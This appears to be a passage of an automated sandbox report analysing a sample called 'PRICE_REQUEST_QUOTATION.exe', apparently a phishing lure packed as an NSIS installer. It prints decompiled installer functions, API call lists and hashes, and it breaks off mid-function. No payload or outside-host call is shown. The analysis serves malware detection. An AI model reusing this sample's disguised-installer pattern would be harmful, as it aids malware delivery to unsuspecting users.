                                        • Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp
                                        • Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                        • String ID:
                                        • API String ID: 656311269-0
                                        • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                        • Instruction ID: 57335164df1743bbcb08d487c935fc8a3b6535e7f5ebadc10331150790b05021
                                        • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                        • Instruction Fuzzy Hash: 42619235E00304ABEB21CFB4C984BAEB7B9AF49610F54C059F562EB394EB349D42CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405EC2(CHAR* _a4) {
                                        				void* _t2;
                                        
                                        				_t2 = FindFirstFileA(_a4, 0x42c0f0); // executed
                                        				if(_t2 == 0xffffffff) {
                                        					return 0;
                                        				}
                                        				FindClose(_t2);
                                        				return 0x42c0f0;
                                        			}





                                        APIs
                                        • FindFirstFileA.KERNELBASE(?,0042C0F0,0042B4A8,004057DE,0042B4A8,0042B4A8,00000000,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405ECD
                                        • FindClose.KERNEL32(00000000), ref: 00405ED9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID:
                                        • API String ID: 2295610775-0
                                        • Opcode ID: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                        • Instruction ID: 29e96ad6865097314c3b976147751eb8d0045a3fb470af3f15328f49aab52e00
                                        • Opcode Fuzzy Hash: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                        • Instruction Fuzzy Hash: 11D0C9319185209BC2105768AD0885B6A59DB593357108A72B465F62E0CA7499528AEA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E004039B0(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                        				struct HWND__* _v32;
                                        				void* _v84;
                                        				void* _v88;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t35;
                                        				signed int _t37;
                                        				signed int _t39;
                                        				intOrPtr _t44;
                                        				struct HWND__* _t49;
                                        				signed int _t67;
                                        				struct HWND__* _t73;
                                        				signed int _t86;
                                        				struct HWND__* _t91;
                                        				signed int _t99;
                                        				int _t103;
                                        				signed int _t115;
                                        				signed int _t116;
                                        				int _t117;
                                        				signed int _t122;
                                        				struct HWND__* _t125;
                                        				struct HWND__* _t126;
                                        				int _t127;
                                        				long _t130;
                                        				int _t132;
                                        				int _t133;
                                        				void* _t134;
                                        				void* _t142;
                                        
                                        				_t115 = _a8;
                                        				if(_t115 == 0x110 || _t115 == 0x408) {
                                        					_t35 = _a12;
                                        					_t125 = _a4;
                                        					__eflags = _t115 - 0x110;
                                        					 *0x42a084 = _t35;
                                        					if(_t115 == 0x110) {
                                        						 *0x42ec28 = _t125;
                                        						 *0x42a098 = GetDlgItem(_t125, 1);
                                        						_t91 = GetDlgItem(_t125, 2);
                                        						_push(0xffffffff);
                                        						_push(0x1c);
                                        						 *0x429060 = _t91;
                                        						E00403E83(_t125);
                                        						SetClassLongA(_t125, 0xfffffff2,  *0x42e408); // executed
                                        						 *0x42e3ec = E0040140B(4);
                                        						_t35 = 1;
                                        						__eflags = 1;
                                        						 *0x42a084 = 1;
                                        					}
                                        					_t122 =  *0x4091ac; // 0xffffffff
                                        					_t133 = 0;
                                        					_t130 = (_t122 << 6) +  *0x42ec40;
                                        					__eflags = _t122;
                                        					if(_t122 < 0) {
                                        						L34:
                                        						E00403ECF(0x40b);
                                        						while(1) {
                                        							_t37 =  *0x42a084;
                                        							 *0x4091ac =  *0x4091ac + _t37;
                                        							_t130 = _t130 + (_t37 << 6);
                                        							_t39 =  *0x4091ac; // 0xffffffff
                                        							__eflags = _t39 -  *0x42ec44; // 0x2
                                        							if(__eflags == 0) {
                                        								E0040140B(1);
                                        							}
                                        							__eflags =  *0x42e3ec - _t133; // 0x0
                                        							if(__eflags != 0) {
                                        								break;
                                        							}
                                        							_t44 =  *0x42ec44; // 0x2
                                        							__eflags =  *0x4091ac - _t44; // 0xffffffff
                                        							if(__eflags >= 0) {
                                        								break;
                                        							}
                                        							_t116 =  *(_t130 + 0x14);
                                        							E00405BE9(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
                                        							_push( *((intOrPtr*)(_t130 + 0x20)));
                                        							_push(0xfffffc19);
                                        							E00403E83(_t125);
                                        							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                        							_push(0xfffffc1b);
                                        							E00403E83(_t125);
                                        							_push( *((intOrPtr*)(_t130 + 0x28)));
                                        							_push(0xfffffc1a);
                                        							E00403E83(_t125);
                                        							_t49 = GetDlgItem(_t125, 3);
                                        							__eflags =  *0x42ecac - _t133; // 0x0
                                        							_v32 = _t49;
                                        							if(__eflags != 0) {
                                        								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                        								__eflags = _t116;
                                        							}
                                        							ShowWindow(_t49, _t116 & 0x00000008);
                                        							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                                        							E00403EA5(_t116 & 0x00000002);
                                        							_t117 = _t116 & 0x00000004;
                                        							EnableWindow( *0x429060, _t117);
                                        							__eflags = _t117 - _t133;
                                        							if(_t117 == _t133) {
                                        								_push(1);
                                        							} else {
                                        								_push(_t133);
                                        							}
                                        							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                        							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                        							__eflags =  *0x42ecac - _t133; // 0x0
                                        							if(__eflags == 0) {
                                        								_push( *0x42a098);
                                        							} else {
                                        								SendMessageA(_t125, 0x401, 2, _t133);
                                        								_push( *0x429060);
                                        							}
                                        							E00403EB8();
                                        							E00405BC7(0x42a0a0, "jwfmxhqapdbzygp Setup");
                                        							E00405BE9(0x42a0a0, _t125, _t130,  &(0x42a0a0[lstrlenA(0x42a0a0)]),  *((intOrPtr*)(_t130 + 0x18)));
                                        							SetWindowTextA(_t125, 0x42a0a0);
                                        							_push(_t133);
                                        							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                        							__eflags = _t67;
                                        							if(_t67 != 0) {
                                        								continue;
                                        							} else {
                                        								__eflags =  *_t130 - _t133;
                                        								if( *_t130 == _t133) {
                                        									continue;
                                        								}
                                        								__eflags =  *(_t130 + 4) - 5;
                                        								if( *(_t130 + 4) != 5) {
                                        									DestroyWindow( *0x42e3f8);
                                        									 *0x429870 = _t130;
                                        									__eflags =  *_t130 - _t133;
                                        									if( *_t130 <= _t133) {
                                        										goto L58;
                                        									}
                                        									_t73 = CreateDialogParamA( *0x42ec20,  *_t130 +  *0x42e400 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
                                        									__eflags = _t73 - _t133;
                                        									 *0x42e3f8 = _t73;
                                        									if(_t73 == _t133) {
                                        										goto L58;
                                        									}
                                        									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                        									_push(6);
                                        									E00403E83(_t73);
                                        									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                        									ScreenToClient(_t125, _t134 + 0x10);
                                        									SetWindowPos( *0x42e3f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                        									_push(_t133);
                                        									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                        									__eflags =  *0x42e3ec - _t133; // 0x0
                                        									if(__eflags != 0) {
                                        										goto L61;
                                        									}
                                        									ShowWindow( *0x42e3f8, 8);
                                        									E00403ECF(0x405);
                                        									goto L58;
                                        								}
                                        								__eflags =  *0x42ecac - _t133; // 0x0
                                        								if(__eflags != 0) {
                                        									goto L61;
                                        								}
                                        								__eflags =  *0x42eca0 - _t133; // 0x0
                                        								if(__eflags != 0) {
                                        									continue;
                                        								}
                                        								goto L61;
                                        							}
                                        						}
                                        						DestroyWindow( *0x42e3f8);
                                        						 *0x42ec28 = _t133;
                                        						EndDialog(_t125,  *0x429468);
                                        						goto L58;
                                        					} else {
                                        						__eflags = _t35 - 1;
                                        						if(_t35 != 1) {
                                        							L33:
                                        							__eflags =  *_t130 - _t133;
                                        							if( *_t130 == _t133) {
                                        								goto L61;
                                        							}
                                        							goto L34;
                                        						}
                                        						_push(0);
                                        						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                        						__eflags = _t86;
                                        						if(_t86 == 0) {
                                        							goto L33;
                                        						}
                                        						SendMessageA( *0x42e3f8, 0x40f, 0, 1);
                                        						__eflags =  *0x42e3ec - _t133; // 0x0
                                        						return 0 | __eflags == 0x00000000;
                                        					}
                                        				} else {
                                        					_t125 = _a4;
                                        					_t133 = 0;
                                        					if(_t115 == 0x47) {
                                        						SetWindowPos( *0x42a078, _t125, 0, 0, 0, 0, 0x13);
                                        					}
                                        					if(_t115 == 5) {
                                        						asm("sbb eax, eax");
                                        						ShowWindow( *0x42a078,  ~(_a12 - 1) & _t115);
                                        					}
                                        					if(_t115 != 0x40d) {
                                        						__eflags = _t115 - 0x11;
                                        						if(_t115 != 0x11) {
                                        							__eflags = _t115 - 0x111;
                                        							if(_t115 != 0x111) {
                                        								L26:
                                        								return E00403EEA(_t115, _a12, _a16);
                                        							}
                                        							_t132 = _a12 & 0x0000ffff;
                                        							_t126 = GetDlgItem(_t125, _t132);
                                        							__eflags = _t126 - _t133;
                                        							if(_t126 == _t133) {
                                        								L13:
                                        								__eflags = _t132 - 1;
                                        								if(_t132 != 1) {
                                        									__eflags = _t132 - 3;
                                        									if(_t132 != 3) {
                                        										_t127 = 2;
                                        										__eflags = _t132 - _t127;
                                        										if(_t132 != _t127) {
                                        											L25:
                                        											SendMessageA( *0x42e3f8, 0x111, _a12, _a16);
                                        											goto L26;
                                        										}
                                        										__eflags =  *0x42ecac - _t133; // 0x0
                                        										if(__eflags == 0) {
                                        											_t99 = E0040140B(3);
                                        											__eflags = _t99;
                                        											if(_t99 != 0) {
                                        												goto L26;
                                        											}
                                        											 *0x429468 = 1;
                                        											L21:
                                        											_push(0x78);
                                        											L22:
                                        											E00403E5C();
                                        											goto L26;
                                        										}
                                        										E0040140B(_t127);
                                        										 *0x429468 = _t127;
                                        										goto L21;
                                        									}
                                        									__eflags =  *0x4091ac - _t133; // 0xffffffff
                                        									if(__eflags <= 0) {
                                        										goto L25;
                                        									}
                                        									_push(0xffffffff);
                                        									goto L22;
                                        								}
                                        								_push(_t132);
                                        								goto L22;
                                        							}
                                        							SendMessageA(_t126, 0xf3, _t133, _t133);
                                        							_t103 = IsWindowEnabled(_t126);
                                        							__eflags = _t103;
                                        							if(_t103 == 0) {
                                        								goto L61;
                                        							}
                                        							goto L13;
                                        						}
                                        						SetWindowLongA(_t125, _t133, _t133);
                                        						return 1;
                                        					} else {
                                        						DestroyWindow( *0x42e3f8);
                                        						 *0x42e3f8 = _a12;
                                        						L58:
                                        						if( *0x42b0a0 == _t133) {
                                        							_t142 =  *0x42e3f8 - _t133; // 0x0
                                        							if(_t142 != 0) {
                                        								ShowWindow(_t125, 0xa);
                                        								 *0x42b0a0 = 1;
                                        							}
                                        						}
                                        						L61:
                                        						return 0;
                                        					}
                                        				}
                                        			}

































                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
                                        • ShowWindow.USER32(?), ref: 00403A09
                                        • DestroyWindow.USER32 ref: 00403A1D
                                        • SetWindowLongA.USER32 ref: 00403A39
                                        • GetDlgItem.USER32 ref: 00403A5A
                                        • SendMessageA.USER32 ref: 00403A6E
                                        • IsWindowEnabled.USER32(00000000), ref: 00403A75
                                        • GetDlgItem.USER32 ref: 00403B23
                                        • GetDlgItem.USER32 ref: 00403B2D
                                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403B47
                                        • SendMessageA.USER32 ref: 00403B98
                                        • GetDlgItem.USER32 ref: 00403C3E
                                        • ShowWindow.USER32(00000000,?), ref: 00403C5F
                                        • EnableWindow.USER32(?,?), ref: 00403C71
                                        • EnableWindow.USER32(?,?), ref: 00403C8C
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA2
                                        • EnableMenuItem.USER32 ref: 00403CA9
                                        • SendMessageA.USER32 ref: 00403CC1
                                        • SendMessageA.USER32 ref: 00403CD4
                                        • lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,jwfmxhqapdbzygp Setup), ref: 00403CFD
                                        • SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
                                        • ShowWindow.USER32(?,0000000A), ref: 00403E40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                        • String ID: jwfmxhqapdbzygp Setup
                                        • API String ID: 4050669955-2118755563
                                        • Opcode ID: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                        • Instruction ID: f9ad972cf69bfdf420a9f6130eb54bdd223da945896b7aa78364cccc95eacf8d
                                        • Opcode Fuzzy Hash: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                        • Instruction Fuzzy Hash: 9FC1D331604204AFDB21AF62ED45E2B3F6CEB44706F50053EF641B52E1C779A942DB5E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 96%
                                        			E0040361A(void* __eflags) {
                                        				intOrPtr _v4;
                                        				intOrPtr _v8;
                                        				int _v12;
                                        				int _v16;
                                        				char _v20;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr* _t20;
                                        				signed int _t24;
                                        				void* _t28;
                                        				void* _t30;
                                        				int _t31;
                                        				void* _t34;
                                        				int _t37;
                                        				int _t38;
                                        				intOrPtr _t39;
                                        				int _t42;
                                        				intOrPtr _t60;
                                        				char _t62;
                                        				CHAR* _t64;
                                        				signed char _t68;
                                        				struct HINSTANCE__* _t76;
                                        				CHAR* _t79;
                                        				intOrPtr _t81;
                                        				CHAR* _t85;
                                        
                                        				_t81 =  *0x42ec30; // 0x6c0230
                                        				_t20 = E00405F57(3);
                                        				_t88 = _t20;
                                        				if(_t20 == 0) {
                                        					_t79 = 0x42a0a0;
                                        					"1033" = 0x7830;
                                        					E00405AAE(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a0a0, 0);
                                        					__eflags =  *0x42a0a0;
                                        					if(__eflags == 0) {
                                        						E00405AAE(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x42a0a0, 0);
                                        					}
                                        					lstrcatA("1033", _t79);
                                        				} else {
                                        					E00405B25("1033",  *_t20() & 0x0000ffff);
                                        				}
                                        				E004038E3(_t76, _t88);
                                        				_t24 =  *0x42ec38; // 0x80
                                        				_t84 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
                                        				 *0x42eca0 = _t24 & 0x00000020;
                                        				 *0x42ecbc = 0x10000;
                                        				if(E0040579B(_t88, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
                                        					L16:
                                        					if(E0040579B(_t96, _t84) == 0) {
                                        						E00405BE9(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
                                        					}
                                        					_t28 = LoadImageA( *0x42ec20, 0x67, 1, 0, 0, 0x8040); // executed
                                        					 *0x42e408 = _t28;
                                        					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
                                        						L21:
                                        						if(E0040140B(0) == 0) {
                                        							_t30 = E004038E3(_t76, __eflags);
                                        							__eflags =  *0x42ecc0; // 0x0
                                        							if(__eflags != 0) {
                                        								_t31 = E00404F85(_t30, 0);
                                        								__eflags = _t31;
                                        								if(_t31 == 0) {
                                        									E0040140B(1);
                                        									goto L33;
                                        								}
                                        								__eflags =  *0x42e3ec; // 0x0
                                        								if(__eflags == 0) {
                                        									E0040140B(2);
                                        								}
                                        								goto L22;
                                        							}
                                        							ShowWindow( *0x42a078, 5); // executed
                                        							_t37 = E00405EE9("RichEd20"); // executed
                                        							__eflags = _t37;
                                        							if(_t37 == 0) {
                                        								E00405EE9("RichEd32");
                                        							}
                                        							_t85 = "RichEdit20A";
                                        							_t38 = GetClassInfoA(0, _t85, 0x42e3c0);
                                        							__eflags = _t38;
                                        							if(_t38 == 0) {
                                        								GetClassInfoA(0, "RichEdit", 0x42e3c0);
                                        								 *0x42e3e4 = _t85;
                                        								RegisterClassA(0x42e3c0);
                                        							}
                                        							_t39 =  *0x42e400; // 0x0
                                        							_t42 = DialogBoxParamA( *0x42ec20, _t39 + 0x00000069 & 0x0000ffff, 0, E004039B0, 0); // executed
                                        							E0040356A(E0040140B(5), 1);
                                        							return _t42;
                                        						}
                                        						L22:
                                        						_t34 = 2;
                                        						return _t34;
                                        					} else {
                                        						_t76 =  *0x42ec20; // 0x400000
                                        						 *0x42e3d4 = _t28;
                                        						_v20 = 0x624e5f;
                                        						 *0x42e3c4 = E00401000;
                                        						 *0x42e3d0 = _t76;
                                        						 *0x42e3e4 =  &_v20;
                                        						if(RegisterClassA(0x42e3c0) == 0) {
                                        							L33:
                                        							__eflags = 0;
                                        							return 0;
                                        						}
                                        						_t12 =  &_v16; // 0x624e5f
                                        						SystemParametersInfoA(0x30, 0, _t12, 0);
                                        						 *0x42a078 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42ec20, 0);
                                        						goto L21;
                                        					}
                                        				} else {
                                        					_t76 =  *(_t81 + 0x48);
                                        					if(_t76 == 0) {
                                        						goto L16;
                                        					}
                                        					_t60 =  *0x42ec58; // 0x6c56f4
                                        					_t79 = 0x42dbc0;
                                        					E00405AAE( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x42dbc0, 0);
                                        					_t62 =  *0x42dbc0; // 0x54
                                        					if(_t62 == 0) {
                                        						goto L16;
                                        					}
                                        					if(_t62 == 0x22) {
                                        						_t79 = 0x42dbc1;
                                        						 *((char*)(E004056E5(0x42dbc1, 0x22))) = 0;
                                        					}
                                        					_t64 = lstrlenA(_t79) + _t79 - 4;
                                        					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
                                        						L15:
                                        						E00405BC7(_t84, E004056BA(_t79));
                                        						goto L16;
                                        					} else {
                                        						_t68 = GetFileAttributesA(_t79);
                                        						if(_t68 == 0xffffffff) {
                                        							L14:
                                        							E00405701(_t79);
                                        							goto L15;
                                        						}
                                        						_t96 = _t68 & 0x00000010;
                                        						if((_t68 & 0x00000010) != 0) {
                                        							goto L15;
                                        						}
                                        						goto L14;
                                        					}
                                        				}
                                        			}

                                        APIs
                                          • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                          • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                        • lstrcatA.KERNEL32(1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,00000000), ref: 0040368B
                                        • lstrlenA.KERNEL32(TclpOwkq,?,?,?,TclpOwkq,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403700
                                        • lstrcmpiA.KERNEL32(?,.exe,TclpOwkq,?,?,?,TclpOwkq,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000), ref: 00403713
                                        • GetFileAttributesA.KERNEL32(TclpOwkq), ref: 0040371E
                                        • LoadImageA.USER32 ref: 00403767
                                          • Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32
                                        • RegisterClassA.USER32 ref: 004037AE
                                        • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
                                        • CreateWindowExA.USER32 ref: 004037FF
                                        • ShowWindow.USER32(00000005,00000000), ref: 00403835
                                        • GetClassInfoA.USER32 ref: 00403861
                                        • GetClassInfoA.USER32 ref: 0040386E
                                        • RegisterClassA.USER32 ref: 00403877
                                        • DialogBoxParamA.USER32 ref: 00403896
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: "C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$TclpOwkq$_Nb
                                        • API String ID: 1975747703-3258619484
                                        • Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                        • Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
                                        • Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                        • Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 80%
                                        			E00402C55(void* __eflags, signed int _a4) {
                                        				DWORD* _v8;
                                        				DWORD* _v12;
                                        				void* _v16;
                                        				intOrPtr _v20;
                                        				long _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				intOrPtr _v40;
                                        				signed int _v44;
                                        				long _t43;
                                        				signed int _t50;
                                        				void* _t53;
                                        				signed int _t54;
                                        				void* _t57;
                                        				intOrPtr* _t59;
                                        				long _t60;
                                        				signed int _t65;
                                        				signed int _t67;
                                        				signed int _t70;
                                        				signed int _t71;
                                        				signed int _t77;
                                        				intOrPtr _t80;
                                        				long _t82;
                                        				signed int _t85;
                                        				signed int _t87;
                                        				void* _t89;
                                        				signed int _t90;
                                        				signed int _t93;
                                        				void* _t94;
                                        
                                        				_t82 = 0;
                                        				_v12 = 0;
                                        				_v8 = 0;
                                        				_t43 = GetTickCount();
                                        				_t91 = "C:\\Users\\alfons\\Desktop\\PRICE_REQUEST_QUOTATION.exe";
                                        				 *0x42ec2c = _t43 + 0x3e8;
                                        				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\PRICE_REQUEST_QUOTATION.exe", 0x400);
                                        				_t89 = E0040589E(_t91, 0x80000000, 3);
                                        				_v16 = _t89;
                                        				 *0x409014 = _t89;
                                        				if(_t89 == 0xffffffff) {
                                        					return "Error launching installer";
                                        				}
                                        				_t92 = "C:\\Users\\alfons\\Desktop";
                                        				E00405BC7("C:\\Users\\alfons\\Desktop", _t91);
                                        				E00405BC7(0x436000, E00405701(_t92));
                                        				_t50 = GetFileSize(_t89, 0);
                                        				__eflags = _t50;
                                        				 *0x428c50 = _t50;
                                        				_t93 = _t50;
                                        				if(_t50 <= 0) {
                                        					L24:
                                        					E00402BF1(1);
                                        					__eflags =  *0x42ec34 - _t82; // 0x8800
                                        					if(__eflags == 0) {
                                        						goto L29;
                                        					}
                                        					__eflags = _v8 - _t82;
                                        					if(_v8 == _t82) {
                                        						L28:
                                        						_t53 = GlobalAlloc(0x40, _v24); // executed
                                        						_t94 = _t53;
                                        						_t54 =  *0x42ec34; // 0x8800
                                        						E004030E2(_t54 + 0x1c);
                                        						_push(_v24);
                                        						_push(_t94);
                                        						_push(_t82);
                                        						_push(0xffffffff); // executed
                                        						_t57 = E00402E8E(); // executed
                                        						__eflags = _t57 - _v24;
                                        						if(_t57 == _v24) {
                                        							__eflags = _v44 & 0x00000001;
                                        							 *0x42ec30 = _t94;
                                        							 *0x42ec38 =  *_t94;
                                        							if((_v44 & 0x00000001) != 0) {
                                        								 *0x42ec3c =  *0x42ec3c + 1;
                                        								__eflags =  *0x42ec3c;
                                        							}
                                        							_t40 = _t94 + 0x44; // 0x44
                                        							_t59 = _t40;
                                        							_t85 = 8;
                                        							do {
                                        								_t59 = _t59 - 8;
                                        								 *_t59 =  *_t59 + _t94;
                                        								_t85 = _t85 - 1;
                                        								__eflags = _t85;
                                        							} while (_t85 != 0);
                                        							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                        							 *(_t94 + 0x3c) = _t60;
                                        							E0040585F(0x42ec40, _t94 + 4, 0x40);
                                        							__eflags = 0;
                                        							return 0;
                                        						}
                                        						goto L29;
                                        					}
                                        					E004030E2( *0x414c40);
                                        					_t65 = E004030B0( &_a4, 4);
                                        					__eflags = _t65;
                                        					if(_t65 == 0) {
                                        						goto L29;
                                        					}
                                        					__eflags = _v12 - _a4;
                                        					if(_v12 != _a4) {
                                        						goto L29;
                                        					}
                                        					goto L28;
                                        				} else {
                                        					do {
                                        						_t67 =  *0x42ec34; // 0x8800
                                        						_t90 = _t93;
                                        						asm("sbb eax, eax");
                                        						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
                                        						__eflags = _t93 - _t70;
                                        						if(_t93 >= _t70) {
                                        							_t90 = _t70;
                                        						}
                                        						_t71 = E004030B0(0x420c50, _t90); // executed
                                        						__eflags = _t71;
                                        						if(_t71 == 0) {
                                        							E00402BF1(1);
                                        							L29:
                                        							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                        						}
                                        						__eflags =  *0x42ec34;
                                        						if( *0x42ec34 != 0) {
                                        							__eflags = _a4 & 0x00000002;
                                        							if((_a4 & 0x00000002) == 0) {
                                        								E00402BF1(0);
                                        							}
                                        							goto L20;
                                        						}
                                        						E0040585F( &_v44, 0x420c50, 0x1c);
                                        						_t77 = _v44;
                                        						__eflags = _t77 & 0xfffffff0;
                                        						if((_t77 & 0xfffffff0) != 0) {
                                        							goto L20;
                                        						}
                                        						__eflags = _v40 - 0xdeadbeef;
                                        						if(_v40 != 0xdeadbeef) {
                                        							goto L20;
                                        						}
                                        						__eflags = _v28 - 0x74736e49;
                                        						if(_v28 != 0x74736e49) {
                                        							goto L20;
                                        						}
                                        						__eflags = _v32 - 0x74666f73;
                                        						if(_v32 != 0x74666f73) {
                                        							goto L20;
                                        						}
                                        						__eflags = _v36 - 0x6c6c754e;
                                        						if(_v36 != 0x6c6c754e) {
                                        							goto L20;
                                        						}
                                        						_a4 = _a4 | _t77;
                                        						_t87 =  *0x414c40; // 0x8800
                                        						 *0x42ecc0 =  *0x42ecc0 | _a4 & 0x00000002;
                                        						_t80 = _v20;
                                        						__eflags = _t80 - _t93;
                                        						 *0x42ec34 = _t87;
                                        						if(_t80 > _t93) {
                                        							goto L29;
                                        						}
                                        						__eflags = _a4 & 0x00000008;
                                        						if((_a4 & 0x00000008) != 0) {
                                        							L16:
                                        							_v8 = _v8 + 1;
                                        							_t93 = _t80 - 4;
                                        							__eflags = _t90 - _t93;
                                        							if(_t90 > _t93) {
                                        								_t90 = _t93;
